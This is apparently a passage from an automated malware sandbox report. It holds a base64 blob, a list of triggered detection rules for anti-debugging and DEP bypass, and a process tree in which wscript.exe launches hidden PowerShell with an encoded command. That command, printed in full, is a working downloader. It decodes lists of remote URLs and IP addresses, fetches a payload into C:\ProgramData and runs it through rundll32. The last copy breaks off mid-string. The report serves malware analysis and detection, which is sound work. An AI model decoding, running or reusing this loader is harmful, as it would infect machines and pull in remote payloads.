bgBpAGMAIAA9ACAAIgBtAGEAegBlAGQAbAB5AEcAbAB5AGMAbwBnAGUAbgBvAGwAeQBzAGkAcwAiADsAJABTAHEAdQBpAGwAbABpAGQAYQBlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABBAEEATwBRAEEAdQBBAEQARQBBAE4AdwBBAHkAQQBDADQAQQBOAEEAQQAxAEEAQwA0AEEATwBBAEEAdgBBAEcAWQBBAGEAZwBCAE8AQQBFAGsAQQBWAEEAQgB3AEEARwBNAEEATAB3AEIAVgBBAEgAWQBBAE4AZwBBAHkAQQBFAEUAQQBPAFEAQgB0AEEAQQA9AD0AVwBmAHgAZgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEEAQQBPAFEAQQB1AEEARABFAEEATgB3AEEAeQBBAEMANABBAE4AQQBBADEAQQBDADQAQQBPAFEAQQB2AEEARQB3AEEAWgBRAEIAeABBAEMAOABBAFQAUQBCAEkAQQBGAEEAQQBWAFEAQgBCAEEARQBVAEEAZAB3AEEAdwBBAEcARQBBAFcAUQBCAFEAQQBBAD0APQAiADsAZgBvAHIAZQBhAGMAaAAgACgAJABpAG4AYwBvAG0AbQBvAGQAaQBvAHUAcwAgAGkAbgAgACQAUwBxAHUAaQBsAGwAaQBkAGEAZQAgAC0AcwBwAGwAaQB0ACAAIgBXAGYAeABmACIAKQAgAHsAJAByAGEAdgBpAHMAaABtAGUAbgB0AHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBFAE0AQQBiAHcAQgB5AEEASABrAEEAYwBBAEIAbwBBAEcARQBBAFoAUQBCAHUAQQBHAGsAQQBaAEEAQgBRAEEARwBnAEEAWgBRAEIAdQBBAEcAOABBAGUAQQBCAHAAQQBHAFEAQQBMAGcAQgB1AEEARwBjAEEAYgB3AEEAPQB5AHIAPQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAEkAQQBhAFEAQgB2AEEASABBAEEAYQBBAEIANQBBAEgAUQBBAFoAUQBCAFEAQQBIAEkAQQBaAFEAQgB3AEEARwBFAEEAYwBnAEIAaABBAEgAUQBBAGEAUQBCADIAQQBHAFUAQQBMAGcAQgAwAEEARwA4AEEAZQBRAEIAegBBAEEAPQA9ACIAOwB0AHIAeQAgAHsAJAB0AGUAbABlAGMAYQBtAGUAcgBhACAAPQAgADMAMAA0ADsAJABpAG4AYwBsAGEAcwBwAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAaQBuAGMAbwBtAG0AbwBkAGkAbwB1AHMAKQApADsAaQB3AHIAIAAkAGkAbgBjAGwAYQBzAHAAcwAgAC0ATwAgAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAGYAbwB1AGwAaQBzAGgAUgBpAHYAZQByAGwAZQBzAHMALgBBAGcAbwBuAGkAYQBQAGgAbwBuAG8AbQBpAG0AaQBjADsAJABjAGEAZQBzAGEAcgBpAHMAdABzACAAPQAgACIAUwBhAHIAbwBuAGkAYwBJAG4AdgBhAGcAaQBuAGEAdABpAG4AZwAiADsAJABUAHcAaQBzAHQAZQBuAGUAZABIAGUAbQBpAGUAcABpAGwAZQBwAHMAeQAgAD0AIAAiAHIAZQBjAGEAcAB0AGkAdgBhAHQAaQBvAG4AUwBpAG0AcABsAHkAIgA7ACQAdABpAHQAbABlAG4AZQBHAHUAbgBkAGkAZQAgAD0AIAAiAE4AbwBuAGIAYQBzAGUAbQBlAG4AdABXAGkAcwBlAGgAZQBhAHIAdABlAGQAIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIABDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABmAG8AdQBsAGkAcwBoAFIAaQB2AGUAcgBsAGUAcwBzAC4AQQBnAG8AbgBpAGEAUABoAG8AbgBvAG0AaQBtAGkAYwApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADEAMgA3ADAAOAAwACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEAUQB3AEEANgBBAEYAdwBBAFUAQQBCAHkAQQBHADgAQQBaAHcAQgB5AEEARwBFAEEAYgBRAEIARQBBAEcARQBBAGQAQQBCAGgAQQBGAHcAQQBaAGcAQgB2AEEASABVAEEAYgBBAEIAcABBAEgATQBBAGEAQQBCAFMAQQBHAGsAQQBkAGcAQgBsAEEASABJAEEAYgBBAEIAbABBAEgATQBBAGMAdwBBAHUAQQBFAEUAQQBaAHcAQgB2AEEARwA0AEEAYQBRAEIAaABBAEYAQQBBAGEAQQBCAHYAQQBHADQAQQBiAHcAQgB0AEEARwBrAEEAYgBRAEIAcABBAEcATQBBAEwAQQBCAHcAQQBIAEkAQQBhAFEAQgB1AEEASABRAEEATwB3AEIATwBBAEcAVQBBAGUAQQBCADAAQQBFAG8AQQBVAHcAQQA9ACIAOwAkAE4AdQBuAG4AaQBzAGgAIAA9ACAAIgBJAGcAbgBlAG8AYQBxAHUAZQBvAHUAcwBVAG4AcgBvAGIAZQBkACIAOwAkAFEAdQBlAHMAdABpAG8AbgBhAGIAbABlACAAPQAgACIARwBvAG8AcwBlAGIAZQByAHIAeQBOAG8AbgBjAG8AZQByAGMAaQBvAG4AIgA7AGIAcgBlAGEAawA7AE4AZQB4AHQASgBTADsAfQBOAGUAeAB0AEoAUwA7AH0AIABjAGEAdABjAGgAIAB7ACQAdgBlAHIAbgBpAHgAZQBzAFMAbgBhAHAAZAByAGEAZwBvAG4AcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQATQBBAE8AUQBBAHUAQQBEAEkAQQBNAEEAQQAyAEEAQwA0AEEATgBBAEEAMQBBAEMANABBAE0AUQBBADAAQQBEAEkAQQB4AE8ATQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAEQAQQBHADgAQQBiAEEAQgBzAEEARwBVAEEAZABBAEIAcABBAEcANABBAFoAdwBCAFcAQQBHAFUAQQBjAGcAQgB1AEEARwBFAEEAWQB3AEIAMQBBAEcAdwBBAFkAUQBCAHkAQQBHAGsAQQBjAHcAQgAwAEEAQwA0AEEAWQB3AEIAeQBBAEcAawBBAFkAdwBCAHIAQQBHAFUAQQBkAEEAQQA9AHgATwBNAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAUwBBAEcARQBBAGQAZwBCAGwAQQBHAHcAQQBhAFEAQgB1AEEARwBjAEEAYwB3AEIAUABBAEgAVQBBAGQAQQBCAHoAQQBHAEUAQQBkAEEAQQB1AEEARwAwAEEAWgBRAEEAPQAiADsAJABDAG8AbgBjAGUAcwBzAGkAbwBuAGEAaQByAGUAcwBHAGwAdQBtAHAAaQBuAGUAcwBzACAAPQAgACIAQgB1AHAAbABlAHUAcgB1AG0AQwBhAHQAZQBnAG8AcgBpAHMAZQAiADsAJABhAHMAYwBhAGIAYQByAHQARgBhAGMAaQBsAGkAdABhAHQAaQB2AGUAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEEAQQBOAHcAQQB1AEEARABVAEEATgBBAEEAdQBBAEQAawBBAE0AZwBBAHUAQQBEAFUAQQBOAFEAQQA9AGsAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQBrAEEAYgBRAEIAdwBBAEgASQBBAFoAUQBCAHoAQQBIAE0AQQBZAFEAQgB5AEEARwBrAEEATABnAEIAbwBBAEcAOABBAGIAQQBCAGsAQQBHAGsAQQBiAGcAQgBuAEEASABNAEEAawBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAHUAQQBHADgAQQBiAGcAQgB6AEEARwBVAEEAYwBnAEIAcABBAEcAOABBAGQAUQBCAHoAQQBHAHcAQQBlAFEAQQB1AEEARwBFAEEAWQB3AEIAagBBAEcAOABBAGQAUQBCAHUAQQBIAFEAQQBZAFEAQgB1AEEASABRAEEAYwB3AEEAPQBrAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAMQBBAEcANABBAGMAUQBCADEAQQBHAFUAQQBjAGcAQgBwAEEARwBVAEEAWgBBAEEAdQBBAEcAWQBBAGMAZwBBAD0AIgA7AH0AfQAkAEUAeABzAGUAYwBhAG4AdABzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEASABJAEEAWQBRAEIAMABBAEgAUQBBAGIAQQBCAGwAQQBHAEkAQQBkAFEAQgB6AEEARwBnAEEAUQBnAEIAcABBAEcAYwBBAGEAQQBCADAAQQBHAFUAQQBaAEEAQQB1AEEARwAwAEEAWQBRAEIAeQBBAEcAcwBBAFoAUQBCADAAQQBBAD0APQAiADsAJABzAHEAdQBpAGIAcwB0AGUAcgBIAGUAeABhAG0AZQB0AGgAeQBsAGUAbgBlAHQAZQB0AHIAYQBtAGkAbgBlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBRAEEAYwBnAEIAaABBAEcATQBBAGEAQQBCAGwAQQBHAGsAQQBaAEEAQgBsAEEARQA4AEEAWgBnAEIAbQBBAEcAVQBBAGIAZwBCAHoAQQBHAGsAQQBkAGcAQgBsAEEASABNAEEATABnAEIAdABBAEcAOABBAGIAUQBBAD0AbABpAEEAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATgB3AEEAeQBBAEMANABBAE0AZwBBAHkAQQBEAEUAQQBMAGcAQQB5AEEARABRAEEATgBBAEEAdQBBAEQASQBBAE0AQQBBADEAQQBBAD0APQBsAGkAQQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAGcAQQBOAHcAQQB1AEEARABFAEEATQBnAEEAeQBBAEMANABBAE0AUQBBADQAQQBEAEkAQQBMAGcAQQAzAEEARABNAEEAIgA7ACQAdAByAG8AcABoAG8AZABlAHIAbQBCAGUAbgB6AGkAbAAgAD0AIAAyADEANwA7AA==" |
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Bypass DEP | rule | disable_dep | ||||||
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Bypass DEP | rule | disable_dep |
parent_process | wscript.exe | martian_process | "C:\Windows\System32\wscript.exe" "C:\Users\test22\AppData\Local\Temp\Azpq.js" Pinbrain AlphanumericBristles hyperbarbarismPhenazine | ||||||
parent_process | wscript.exe | martian_process | wscript "C:\Users\test22\AppData\Local\Temp\Azpq.js" Pinbrain AlphanumericBristles hyperbarbarismPhenazine | ||||||
parent_process | wscript.exe | martian_process | powershell -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -encodedcommand "JABiAG8AbABlAHcAbwByAHQAIAA9ACAAIgBhAHIAYQB3AGEAawAiADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQA0ADsAJAB1AG4AaABvAG0AbwBsAG8AZwBpAHoAZQBkAEQAaQBzAHQAcgBhAGMAdABpAG4AZwAgAD0AIAAiAGgAbwBsAGwAeQBoAG8AYwBrACIAOwAkAGIAdQBtAGIAbABlAGIAZQByAHIAeQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEANQBBAEQAYwBBAEwAZwBBAHgAQQBEAE0AQQBOAHcAQQB1AEEARABFAEEATQBRAEEAMQBBAEMANABBAE0AZwBBADEAQQBEAFUAQQB3AGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAUQBBAEgASQBBAFoAUQBCADIAQQBHAGsAQQBjAHcAQgBwAEEARwBJAEEAYgBBAEIANQBBAEUAOABBAFkAdwBCAGoAQQBHAGsAQQBaAEEAQgBsAEEARwA0AEEAZABBAEIAaABBAEcAdwBBAGMAdwBBAHUAQQBHAGMAQQBZAFEAQgB0AEEARwBVAEEAYwB3AEEAPQB3AGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgASQBBAFoAUQBCAGoAQQBHAGsAQQBjAHcAQgB6AEEARwBrAEEAYgB3AEIAdQBBAEMANABBAGMAQQBCAGgAQQBIAEkAQQBkAEEAQgB1AEEARwBVAEEAYwBnAEIAegBBAEEAPQA9AHcAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARwBRAEEAWgBRAEIAMwBBAEcATQBBAGQAUQBCAHcAQQBGAEEAQQBiAHcAQgB6AEEASABRAEEAWgBRAEIAdQBBAEcATQBBAFoAUQBCAHcAQQBHAGcAQQBZAFEAQgBzAEEARwA4AEEAYgBnAEEAdQBBAEcAUQBBAGIAdwBCAG4AQQBBAD0APQAiADsAJABtAHkAZQBsAG8AbgBpAGMAIAA9ACAAIgBtAGEAegBlAGQAbAB5AEcAbAB5AGMAbwBnAGUAbgBvAGwAeQBzAGkAcwAiADsAJABTAHEAdQBpAGwAbABpAGQAYQBlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABBAEEATwBRAEEAdQBBAEQARQBBAE4AdwBBAHkAQQBDADQAQQBOAEEAQQAxAEEAQwA0AEEATwBBAEEAdgBBAEcAWQBBAGEAZwBCAE8AQQBFAGsAQQBWAEEAQgB3AEEARwBNAEEATAB3AEIAVgBBAEgAWQBBAE4AZwBBAHkAQQBFAEUAQQBPAFEAQgB0AEEAQQA9AD0AVwBmAHgAZgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEEAQQBPAFEAQQB1AEEARABFAEEATgB3AEEAeQBBAEMANABBAE4AQQBBADEAQQBDADQAQQBPAFEAQQB2AEEARQB3AEEAWgBRAEIAeABBAEMAOABBAFQAUQBCAEkAQQBGAEEAQQBWAFEAQgBCAEEARQBVAEEAZAB3AEEAdwBBAEcARQBBAFcAUQBCAFEAQQBBAD0APQAiADsAZgBvAHIAZQBhAGMAaAAgACgAJABpAG4AYwBvAG0AbQBvAGQAaQBvAHUAcwAgAGkAbgAgACQAUwBxAHUAaQBsAGwAaQBkAGEAZQAgAC0AcwBwAGwAaQB0ACAAIgBXAGYAeABmACIAKQAgAHsAJAByAGEAdgBpAHMAaABtAGUAbgB0AHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBFAE0AQQBiAHcAQgB5AEEASABrAEEAYwBBAEIAbwBBAEcARQBBAFoAUQBCAHUAQQBHAGsAQQBaAEEAQgBRAEEARwBnAEEAWgBRAEIAdQBBAEcAOABBAGUAQQBCAHAAQQBHAFEAQQBMAGcAQgB1AEEARwBjAEEAYgB3AEEAPQB5AHIAPQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAEkAQQBhAFEAQgB2AEEASABBAEEAYQBBAEIANQBBAEgAUQBBAFoAUQBCAFEAQQBIAEkAQQBaAFEAQgB3AEEARwBFAEEAYwBnAEIAaABBAEgAUQBBAGEAUQBCADIAQQBHAFUAQQBMAGcAQgAwAEEARwA4AEEAZQBRAEIAegBBAEEAPQA9ACIAOwB0AHIAeQAgAHsAJAB0AGUAbABlAGMAYQBtAGUAcgBhACAAPQAgADMAMAA0ADsAJABpAG4AYwBsAGEAcwBwAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAaQBuAGMAbwBtAG0AbwBkAGkAbwB1AHMAKQApADsAaQB3AHIAIAAkAGkAbgBjAGwAYQBzAHAAcwAgAC0ATwAgAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAGYAbwB1AGwAaQBzAGgAUgBpAHYAZQByAGwAZQBzAHMALgBBAGcAbwBuAGkAYQBQAGgAbwBuAG8AbQBpAG0AaQBjADsAJABjAGEAZQBzAGEAcgBpAHMAdABzACAAPQAgACIAUwBhAHIAbwBuAGkAYwBJAG4AdgBhAGcAaQBuAGEAdABpAG4AZwAiADsAJABUAHcAaQBzAHQAZQBuAGUAZABIAGUAbQBpAGUAcABpAGwAZQBwAHMAeQAgAD0AIAAiAHIAZQBjAGEAcAB0AGkAdgBhAHQAaQBvAG4AUwBpAG0AcABsAHkAIgA7ACQAdABpAHQAbABlAG4AZQBHAHUAbgBkAGkAZQAgAD0AIAAiAE4AbwBuAGIAYQBzAGUAbQBlAG4AdABXAGkAcwBlAGgAZQBhAHIAdABlAGQAIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIABDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABmAG8AdQBsAGkAcwBoAFIAaQB2AGUAcgBsAGUAcwBzAC4AQQBnAG8AbgBpAGEAUABoAG8AbgBvAG0AaQBtAGkAYwApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADEAMgA3ADAAOAAwACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEAUQB3AEEANgBBAEYAdwBBAFUAQQBCAHkAQQBHADgAQQBaAHcAQgB5AEEARwBFAEEAYgBRAEIARQBBAEcARQBBAGQAQQBCAGgAQQBGAHcAQQBaAGcAQgB2AEEASABVAEEAYgBBAEIAcABBAEgATQBBAGEAQQBCAFMAQQBHAGsAQQBkAGcAQgBsAEEASABJAEEAYgBBAEIAbABBAEgATQBBAGMAdwBBAHUAQQBFAEUAQQBaAHcAQgB2AEEARwA0AEEAYQBRAEIAaABBAEYAQQBBAGEAQQBCAHYAQQBHADQAQQBiAHcAQgB0AEEARwBrAEEAYgBRAEIAcABBAEcATQBBAEwAQQBCAHcAQQBIAEkAQQBhAFEAQgB1AEEASABRAEEATwB3AEIATwBBAEcAVQBBAGUAQQBCADAAQQBFAG8AQQBVAHcAQQA9ACIAOwAkAE4AdQBuAG4AaQBzAGgAIAA9ACAAIgBJAGcAbgBlAG8AYQBxAHUAZQBvAHUAcwBVAG4AcgBvAGIAZQBkACIAOwAkAFEAdQBlAHMAdABpAG8AbgBhAGIAbABlACAAPQAgACIARwBvAG8AcwBlAGIAZQByAHIAeQBOAG8AbgBjAG8AZQByAGMAaQBvAG4AIgA7AGIAcgBlAGEAawA7AE4AZQB4AHQASgBTADsAfQBOAGUAeAB0AEoAUwA7AH0AIABjAGEAdABjAGgAIAB7ACQAdgBlAHIAbgBpAHgAZQBzAFMAbgBhAHAAZAByAGEAZwBvAG4AcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQATQBBAE8AUQBBAHUAQQBEAEkAQQBNAEEAQQAyAEEAQwA0AEEATgBBAEEAMQBBAEMANABBAE0AUQBBADAAQQBEAEkAQQB4AE8ATQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAEQAQQBHADgAQQBiAEEAQgBzAEEARwBVAEEAZABBAEIAcABBAEcANABBAFoAdwBCAFcAQQBHAFUAQQBjAGcAQgB1AEEARwBFAEEAWQB3AEIAMQBBAEcAdwBBAFkAUQBCAHkAQQBHAGsAQQBjAHcAQgAwAEEAQwA0AEEAWQB3AEIAeQBBAEcAawBBAFkAdwBCAHIAQQBHAFUAQQBkAEEAQQA9AHgATwBNAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAUwBBAEcARQBBAGQAZwBCAGwAQQBHAHcAQQBhAFEAQgB1AEEARwBjAEEAYwB3AEIAUABBAEgAVQBBAGQAQQBCAHoAQQBHAEUAQQBkAEEAQQB1AEEARwAwAEEAWgBRAEEAPQAiADsAJABDAG8AbgBjAGUAcwBzAGkAbwBuAGEAaQByAGUAcwBHAGwAdQBtAHAAaQBuAGUAcwBzACAAPQAgACIAQgB1AHAAbABlAHUAcgB1AG0AQwBhAHQAZQBnAG8AcgBpAHMAZQAiADsAJABhAHMAYwBhAGIAYQByAHQARgBhAGMAaQBsAGkAdABhAHQAaQB2AGUAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEEAQQBOAHcAQQB1AEEARABVAEEATgBBAEEAdQBBAEQAawBBAE0AZwBBAHUAQQBEAFUAQQBOAFEAQQA9AGsAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQBrAEEAYgBRAEIAdwBBAEgASQBBAFoAUQBCAHoAQQBIAE0AQQBZAFEAQgB5AEEARwBrAEEATABnAEIAbwBBAEcAOABBAGIAQQBCAGsAQQBHAGsAQQBiAGcAQgBuAEEASABNAEEAawBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAHUAQQBHADgAQQBiAGcAQgB6AEEARwBVAEEAYwBnAEIAcABBAEcAOABBAGQAUQBCAHoAQQBHAHcAQQBlAFEAQQB1AEEARwBFAEEAWQB3AEIAagBBAEcAOABBAGQAUQBCAHUAQQBIAFEAQQBZAFEAQgB1AEEASABRAEEAYwB3AEEAPQBrAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAMQBBAEcANABBAGMAUQBCADEAQQBHAFUAQQBjAGcAQgBwAEEARwBVAEEAWgBBAEEAdQBBAEcAWQBBAGMAZwBBAD0AIgA7AH0AfQAkAEUAeABzAGUAYwBhAG4AdABzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEASABJAEEAWQBRAEIAMABBAEgAUQBBAGIAQQBCAGwAQQBHAEkAQQBkAFEAQgB6AEEARwBnAEEAUQBnAEIAcABBAEcAYwBBAGEAQQBCADAAQQBHAFUAQQBaAEEAQQB1AEEARwAwAEEAWQBRAEIAeQBBAEcAcwBBAFoAUQBCADAAQQBBAD0APQAiADsAJABzAHEAdQBpAGIAcwB0AGUAcgBIAGUAeABhAG0AZQB0AGgAeQBsAGUAbgBlAHQAZQB0AHIAYQBtAGkAbgBlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBRAEEAYwBnAEIAaABBAEcATQBBAGEAQQBCAGwAQQBHAGsAQQBaAEEAQgBsAEEARQA4AEEAWgBnAEIAbQBBAEcAVQBBAGIAZwBCAHoAQQBHAGsAQQBkAGcAQgBsAEEASABNAEEATABnAEIAdABBAEcAOABBAGIAUQBBAD0AbABpAEEAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATgB3AEEAeQBBAEMANABBAE0AZwBBAHkAQQBEAEUAQQBMAGcAQQB5AEEARABRAEEATgBBAEEAdQBBAEQASQBBAE0AQQBBADEAQQBBAD0APQBsAGkAQQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAGcAQQBOAHcAQQB1AEEARABFAEEATQBnAEEAeQBBAEMANABBAE0AUQBBADQAQQBEAEkAQQBMAGcAQQAzAEEARABNAEEAIgA7ACQAdAByAG8AcABoAG8AZABlAHIAbQBCAGUAbgB6AGkAbAAgAD0AIAAyADEANwA7AA==" | ||||||
parent_process | wscript.exe | martian_process | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -encodedcommand "JABiAG8AbABlAHcAbwByAHQAIAA9ACAAIgBhAHIAYQB3AGEAawAiADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQA0ADsAJAB1AG4AaABvAG0AbwBsAG8AZwBpAHoAZQBkAEQAaQBzAHQAcgBhAGMAdABpAG4AZwAgAD0AIAAiAGgAbwBsAGwAeQBoAG8AYwBrACIAOwAkAGIAdQBtAGIAbABlAGIAZQByAHIAeQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEANQBBAEQAYwBBAEwAZwBBAHgAQQBEAE0AQQBOAHcAQQB1AEEARABFAEEATQBRAEEAMQBBAEMANABBAE0AZwBBADEAQQBEAFUAQQB3AGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAUQBBAEgASQBBAFoAUQBCADIAQQBHAGsAQQBjAHcAQgBwAEEARwBJAEEAYgBBAEIANQBBAEUAOABBAFkAdwBCAGoAQQBHAGsAQQBaAEEAQgBsAEEARwA0AEEAZABBAEIAaABBAEcAdwBBAGMAdwBBAHUAQQBHAGMAQQBZAFEAQgB0AEEARwBVAEEAYwB3AEEAPQB3AGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgASQBBAFoAUQBCAGoAQQBHAGsAQQBjAHcAQgB6AEEARwBrAEEAYgB3AEIAdQBBAEMANABBAGMAQQBCAGgAQQBIAEkAQQBkAEEAQgB1AEEARwBVAEEAYwBnAEIAegBBAEEAPQA9AHcAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARwBRAEEAWgBRAEIAMwBBAEcATQBBAGQAUQBCAHcAQQBGAEEAQQBiAHcAQgB6AEEASABRAEEAWgBRAEIAdQBBAEcATQBBAFoAUQBCAHcAQQBHAGcAQQBZAFEAQgBzAEEARwA4AEEAYgBnAEEAdQBBAEcAUQBBAGIAdwBCAG4AQQBBAD0APQAiADsAJABtAHkAZQBsAG8AbgBpAGMAIAA9ACAAIgBtAGEAegBlAGQAbAB5AEcAbAB5AGMAbwBnAGUAbgBvAGwAeQBzAGkAcwAiADsAJABTAHEAdQBpAGwAbABpAGQAYQBlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABBAEEATwBRAEEAdQBBAEQARQBBAE4AdwBBAHkAQQBDADQAQQBOAEEAQQAxAEEAQwA0AEEATwBBAEEAdgBBAEcAWQBBAGEAZwBCAE8AQQBFAGsAQQBWAEEAQgB3AEEARwBNAEEATAB3AEIAVgBBAEgAWQBBAE4AZwBBAHkAQQBFAEUAQQBPAFEAQgB0AEEAQQA9AD0AVwBmAHgAZgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEEAQQBPAFEAQQB1AEEARABFAEEATgB3AEEAeQBBAEMANABBAE4AQQBBADEAQQBDADQAQQBPAFEAQQB2AEEARQB3AEEAWgBRAEIAeABBAEMAOABBAFQAUQBCAEkAQQBGAEEAQQBWAFEAQgBCAEEARQBVAEEAZAB3AEEAdwBBAEcARQBBAFcAUQBCAFEAQQBBAD0APQAiADsAZgBvAHIAZQBhAGMAaAAgACgAJABpAG4AYwBvAG0AbQBvAGQAaQBvAHUAcwAgAGkAbgAgACQAUwBxAHUAaQBsAGwAaQBkAGEAZQAgAC0AcwBwAGwAaQB0ACAAIgBXAGYAeABmACIAKQAgAHsAJAByAGEAdgBpAHMAaABtAGUAbgB0AHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBFAE0AQQBiAHcAQgB5AEEASABrAEEA